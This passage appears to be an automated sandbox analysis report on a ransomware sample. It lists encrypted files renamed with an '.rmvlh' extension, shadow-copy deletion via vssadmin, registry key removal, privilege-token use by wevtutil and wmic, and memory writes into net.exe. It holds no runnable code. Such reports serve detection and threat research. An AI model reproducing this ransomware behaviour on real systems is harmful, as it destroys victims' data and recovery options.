File opened for modification C:\Program Files\Common Files\microsoft shared\MSInfo\fr-FR\msinfo32.exe.mui.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_gdwyXg3xypw0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\base_altgr.xml C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\MANIFEST.MF.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_hN28bvevx-M0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.attributeTransformation.exsd.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_EWoFHzeUDqE0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_Retail-pl.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_7hiRmaQnIQA0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019VL_KMS_Client_AE-ul-oob.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_-Ir3_eeKWB40.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-loaders_zh_CN.jar.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_D3N2gOcL0mQ0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jvmstat.jar.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_92oFVzAOjao0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ExcelVL_KMS_Client-ul-oob.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_X-BDUvRup240.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OneNoteR_OEM_Perp-ppd.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_mtM1aX1OgJc0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Common Files\System\Ole DB\es-ES\sqloledb.rll.mui C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Common Files\System\msadc\es-ES\msdaremr.dll.mui C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\com.jrockit.mc.rcp.product_root_5.5.0.165303.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_jCbFDIbA3Og0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-swing-tabcontrol.xml.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_4dQJGfwtA7I0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PowerPointR_Grace-ul-oob.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_bGzC-_3gzRQ0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProCO365R_Subscription-pl.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_UNjpLQN5E9A0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\jfxswt.jar.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_XK87vMmqKwc0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019VL_MAK_AE-pl.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_YyhcRbDQLPI0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-modules-appui.xml.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_D6LiYSJy_580.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages_fr.properties.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_fEkoqdYFmNM0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Excel2019VL_MAK_AE-ul-phn.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_qY450fw5BSo0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\7-Zip\descript.ion.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_CVb6LtUXU5Y0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Professional2019R_OEM_Perp-ul-phn.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_dfWez84sGvw0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_zh_CN.properties.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_GXY1VYBujJ00.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PowerPointR_Retail-ppd.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_cmr1HdkCTPE0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.xml.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_xlnSAD8vFOM0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\Stationery\Garden.htm C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\de-DE\IPSEventLogMsg.dll.mui C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\jfr\profile.jfc.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_Gb2tZdhSuaI0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_OEM_Perp-ul-phn.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_MUCqyzXav_k0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial4-ppd.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_HRWaX3r8utk0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Common Files\System\msadc\ja-JP\msdaremr.dll.mui C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application-views.xml.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_rzyYxO7H7VA0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_Trial-ppd.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_FL_9_8wZ6zU0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Common Files\System\Ole DB\en-US\oledb32r.dll.mui C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\pkeyconfig-office-client15.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_zPnEz3aOdsA0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\ExitGroup.eprtx.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_879Ncg2tbk00.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProO365R_SubTrial-ul-oob.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_JBJ1ySAXUc40.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\AccessR_Grace-ul-oob.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_tLcEOpc0HzE0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OutlookR_OEM_Perp-pl.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_dJglFczl9640.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Common Files\System\Ole DB\fr-FR\oledb32r.dll.mui.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_AsXRmUtmEtA0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\jvmti.h.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_wW-RskY7mRg0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-execution.jar.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_9bBxLSh4Xmw0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription5-ul-oob.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_WFkHCgwaei40.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProR_Retail2-pl.xrm-ms.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_zwhtPkcdlF40.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\an.txt.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_532CRsP1Vac0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A
File opened for modification C:\Program Files\Common Files\System\Ole DB\fr-FR\sqloledb.rll.mui.UiEp07M_EF9w3JSWkX80W_pASWbmiaUJiZsR0vwM63b_F22779o8nzs0.rmvlh C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP C:\Windows\SysWOW64\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP C:\Windows\SysWOW64\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP C:\Windows\SysWOW64\reg.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2632 wrote to memory of 3796 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2632 wrote to memory of 3796 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2632 wrote to memory of 3796 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 3796 wrote to memory of 3864 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3796 wrote to memory of 3864 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3796 wrote to memory of 3864 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2632 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2632 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2632 wrote to memory of 3360 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 3360 wrote to memory of 512 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3360 wrote to memory of 512 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3360 wrote to memory of 512 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2632 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2632 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2632 wrote to memory of 800 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 800 wrote to memory of 2220 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 800 wrote to memory of 2220 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 800 wrote to memory of 2220 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2632 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2632 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2632 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2812 wrote to memory of 788 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2812 wrote to memory of 788 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2812 wrote to memory of 788 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2632 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2632 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2632 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 3728 wrote to memory of 1460 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3728 wrote to memory of 1460 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3728 wrote to memory of 1460 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2632 wrote to memory of 3516 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2632 wrote to memory of 3516 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2632 wrote to memory of 3516 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 3516 wrote to memory of 480 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3516 wrote to memory of 480 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3516 wrote to memory of 480 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2632 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2632 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2632 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\cd1f5c8ec7be164ae3d70ca50c118e9a270996f9f20c51ede383a96d849c9c52.exe C:\Windows\SysWOW64\net.exe
PID 2824 wrote to memory of 1244 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2824 wrote to memory of 1244 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 2824 wrote to memory of 1244 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
